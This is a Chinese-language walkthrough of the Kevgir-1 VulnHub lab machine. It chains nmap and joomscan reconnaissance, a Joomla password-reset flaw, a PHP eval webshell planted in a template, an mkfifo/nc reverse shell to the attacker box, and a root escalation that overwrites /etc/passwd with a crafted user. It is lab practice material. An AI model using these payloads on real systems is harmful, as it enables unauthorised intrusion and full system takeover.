1、靶機下載地址https://www.vulnhub.com/entry/kevgir-1,137/
2、nmap -sn 192.168.1.0/24掃描靶機IP位址
3、nmap -p- -sV 192.168.1.13掃描埠及其綁定的服務版本信息
4、瀏覽器訪問80、8080沒什麼有用信息,在8081找到joomla cms
5、掃描joomla相關漏洞信息
joomscan -u http://192.168.1.13:8081/6、瀏覽器訪問https://www.exploit-db.com/exploits/6234找到利用說明
7、訪問http://192.168.1.13:8081/index.php?option=com_user&view=reset&layout=confirm在Token文本框內輸入單引號點擊Submit
輸入admin用戶的新密碼
8、http://192.168.1.13:8081/administrator/管理員登錄界面輸入帳號密碼
9、打開Extensions->Template Manager菜單
10、勾選rhuk_milkyway點擊Edit
彈出頁面點擊Edit HTML按鈕
11、最上面添加一句話<?php @eval($_POST['cmd']);?>後Save保存
12、點擊Preview
彈出界面再次點擊Preview
複製下圖地址欄內的地址
13、打開蟻劍添加數據粘貼到URL地址文本框內,如下
雙擊添加的那一條數據進來如下,右邊右鍵選擇在此處打開終端
打開終端
14、nc -lvvp 8888kali開啟監聽
反彈shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.7 8888 >/tmp/f轉換shell
python -c 'import pty;pty.spawn("/bin/bash")'15、查找具有s權位的文件
find / -perm -u=s -type f 2>/dev/null16、tmp下新建passwd文件
cat /etc/passwd > /tmp/passwd17、按照passwd格式構造用戶
openssl passwd -1 -salt hack 123456構造如下用戶名hack密碼123456
hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash18、將構造的用戶寫入到/tmp目錄下的passwd文件內
echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /tmp/passwd19、覆蓋/etc/passwd文件
cp /tmp/passwd /etc/passwd20、su hack輸入密碼123456切換成功,獲取到了root權限
21、練習結束